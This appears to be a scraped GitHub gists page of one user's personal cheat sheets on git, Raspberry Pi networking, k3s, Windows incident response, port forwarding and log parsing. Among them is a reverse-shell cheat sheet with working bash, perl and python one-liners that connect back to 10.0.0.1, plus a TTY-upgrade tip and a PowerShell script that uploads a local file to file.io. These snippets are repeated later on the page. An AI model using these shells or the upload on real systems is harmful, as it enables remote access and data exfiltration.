rollwagen rollwagen

## git_enable_color.sh
git config --global color.ui true
git config --get color.ui

## TTY_reverse_shell.sh
#######################################################
# Upgrading simple shells to fully interactive TTYs   #
#######################################################

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali or elsewhere
$ echo $TERM

## reverse_shells_cheat_sheet.sh
# Bash - Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

#PERL - Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

  ## There’s also an alternative PERL revere shell here [http://www.plenz.com/reverseshell]

# Python - This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

## my_own_cheat_sheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                rollwagen
                / my_own_cheat_sheet.md
            
            
              Last active
              July 14, 2022 04:07
            
              
                Useful windows command line commands for incident investigations. #windows #powershell #wmic
              
          
    Unusual Processes, Services, Reg keys, Scheduled tasks, Accounts

Unusual Processes

cmd.exe
taskmgr.exe
tasklist
wmic process list full

  
## pi_wlan_access_point.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rollwagen
                / pi_wlan_access_point.md
            
            
              Last active
              December 20, 2019 18:19
            
              
                 Configuring wifi interface on Raspberry as WLAN access point. #raspi #wlan
              
          
    Configuring wifi interface on Raspberry as WLAN access point

Configuration steps

sudo apt-get install hostapd
sudo apt-get install dnsmasq

sudo systemctl stop hostapd
sudo systemctl stop dnsmasq


## powershell_file_io_upload.ps1
$sourceFilePath = "/etc/apt/archive"
$siteAddress = "https://file.io/?expires=1w"
$webClient = New-Object System.Net.WebClient
$response
try {
        $response = $webClient.UploadFile($siteAddress,$sourceFilePath)
} catch {
        Write-Host $_
}
[System.Text.Encoding]::ASCII.GetString($response)

## k3s_raspberry_pi_cluster.md

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rollwagen
                / k3s_raspberry_pi_cluster.md
            
            
              Last active
              November 8, 2021 14:51
            
              
                Creating a k8s cluster on Raspberries.
              
          
    Ubuntu

Flash SD card with Ubuntu image

xzcat ubuntu-19.10.1-preinstalled-server-arm64+raspi3.img.xz | sudo dd of=/dev/disk6 bs=32m`
Boot Raspberry. Headless possibel with Ubuntu image as SSH login enabled by default in image.
Login / Set-up SSH

$ ssh ubuntu@192.168.1.80 - test login via ssh (ubuntu/ubuntu)

  
## k8s_k3sup_vagrant_mac.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rollwagen
                / k8s_k3sup_vagrant_mac.md
            
            
              Last active
              January 24, 2020 15:59
            
              
                Running k8s with k3sup in a Ubuntu VM on MacOs using Vagrant (vagrant-vmware-desktop). #k8s #k3sup
              
          
    Running k8s with k3sup in a Ubuntu VM on MacOs using Vagrant (vagrant-vmware-desktop)

Vagrantfile

Vagrant.configure("2") do |config|
  config.vm.box = "bento/ubuntu-19.10"
end
vagrant up
Pre-reqs/info to actually run k3sup

VM's (real) IP adress


## vsftpd_log_parse.sh
IP_ADDRESSES=`cat vsftpd.log | grep CONNECT | awk -F':' '{print $7}'|sed 's/\"//'|sort|uniq|tr '\n' ' '`

for address in $IP_ADDRESSES; do
        curl --silent http://api.ipstack.com/${address}?access_key=$IPSTACK_KEY | jq '.city, .country_name, .continent_name'| tr '\n' ','|sed "s/,$//"
done

## port_forwardeing.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rollwagen
                / port_forwardeing.md
            
            
              Last active
              May 24, 2021 10:06
            
              
                Port forwarding (linux, mac, ssh)
              
          
    Port forwarding (linux, mac, ssh)

Examples and links on how to do port forwarding on

Linux using iptables
MacOS with pfctl (control the packet filter (PF) and NAT device)
with ssh

Additional topic/link:

How to setup port forward at VMware Fusion 8 for OS X
	#######################################################
	# Upgrading simple shells to fully interactive TTYs #
	#######################################################

	# In reverse shell
	$ python -c 'import pty; pty.spawn("/bin/bash")'
	Ctrl-Z

	# In Kali or elsewhere
	$ echo $TERM
	# Bash - Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

	#PERL - Here’s a shorter, feature-free version of the perl-reverse-shell:
	perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

	## There’s also an alternative PERL revere shell here [http://www.plenz.com/reverseshell]

	# Python - This was tested under Linux / Python 2.7:
	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
	$sourceFilePath = "/etc/apt/archive"
	$siteAddress = "https://file.io/?expires=1w"
	$webClient = New-Object System.Net.WebClient
	$response
	try {
	$response = $webClient.UploadFile($siteAddress,$sourceFilePath)
	} catch {
	Write-Host $_
	}
	[System.Text.Encoding]::ASCII.GetString($response)
	IP_ADDRESSES=`cat vsftpd.log \| grep CONNECT \| awk -F':' '{print $7}'\|sed 's/\"//'\|sort\|uniq\|tr '\n' ' '`

	for address in $IP_ADDRESSES; do
	curl --silent http://api.ipstack.com/${address}?access_key=$IPSTACK_KEY \| jq '.city, .country_name, .continent_name'\| tr '\n' ','\|sed "s/,$//"
	done